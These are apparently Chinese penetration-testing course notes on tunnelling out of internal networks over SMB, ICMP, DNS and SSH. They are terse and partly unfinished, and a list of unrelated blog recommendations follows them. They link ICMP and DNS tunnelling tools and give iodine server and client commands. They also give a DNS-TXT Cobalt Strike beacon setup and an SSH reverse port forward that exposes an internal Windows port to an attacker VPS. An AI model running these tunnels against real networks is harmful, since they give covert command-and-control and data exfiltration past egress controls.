内网渗透-隧道判断-SSH-DNS-icmp-smb-上线linux-mac

1.通道判断

#SMB 隧道&通讯&上线

判断:445 通讯

上线:借助通讯后绑定上线

通讯:直接 SMB 协议通讯即可

#ICMP 隧道&通讯&上线

判断:ping 命令

上线:见前面课程

通讯:其他项目(icmpsh icmptunnel)

https://github.com/esrrhs/spp

https://github.com/bdamele/icmpsh

https://github.com/esrrhs/pingtunnel

#DNS 隧道&通讯&上线

判断:nslookup dig

1、上线环境:内网主机只出网 DNS 协议数据,解决上线

-域名申请及配置

-监听器创建及配置

-后门绑定监听器及生成

2.dns隧道上线

进行域名配置

配置cs

ttx.com 是注册域名

进入会话执行

mode dns-txt

内网主机只出网 DNS 协议数据,解决通讯

https://github.com/yarrick/iodine

判断出网:nslookup www.baidu.com

服务器:设置密码 hzy0 并创建虚拟 IP 及绑定域名指向

iodined -f -c -P hzy0 192.168.0.1 ns1.ttx.com -DD 设置密码 hzy0 并创建虚拟 IP 及绑定域名指向

客户端:连接密码 hzy0 并绑定域名指向

iodine -f -M 200 -P hzy0 ns1.ttx.com

尝试通讯尝试连接: ssh root@192.168.0.2

3.ssh隧道做内网探针

出站规则松懈:

在linux执行

将windows8080端口流量通过ssh隧道提交给vps

ssh -CfNg -R 1234:windwosip:8080 root@vps_ip

入站规则松懈:

4.linux上线cs
相关推荐
万联WANFLOW3 小时前
SD-WAN 控制平面高可用怎么做?SDWAN 控制器挂了,全网会发生什么
运维·网络·分布式·架构
SkyWalking中文站5 小时前
认识 Horizon UI · AI Assistant:用日常语言查询你的可观测性数据
运维·监控·自动化运维
艾莉丝努力练剑6 小时前
OpenCode AI 编程:Ubuntu 24.04 环境安装与使用指南
linux·服务器·网络·人工智能·tcp/ip·ubuntu
崇山峻岭之间6 小时前
Keil5输出hex转换为bin的设置
linux·运维·服务器
Hoxy.R7 小时前
KingbaseES读写分离高可用集群扩容、备库重建与故障切换实战
运维·数据库
谷雪_6587 小时前
Linux 网络命名空间:从内核原理到企业级容器网络架构全景实战
linux·网络·架构
qq_163135758 小时前
Linux 【03- chgrp命令超详细教程】
linux
CodeStats8 小时前
【编程语言】深度梳理C/C++、Java、Python、Go、Rust的区别
java·linux·c语言·c++·python·rust·go
考虑考虑8 小时前
nginx配置ssl
运维·后端·nginx
我会尽全力 乐观而坚强9 小时前
MySQL库与表的操作
linux·数据库·mysql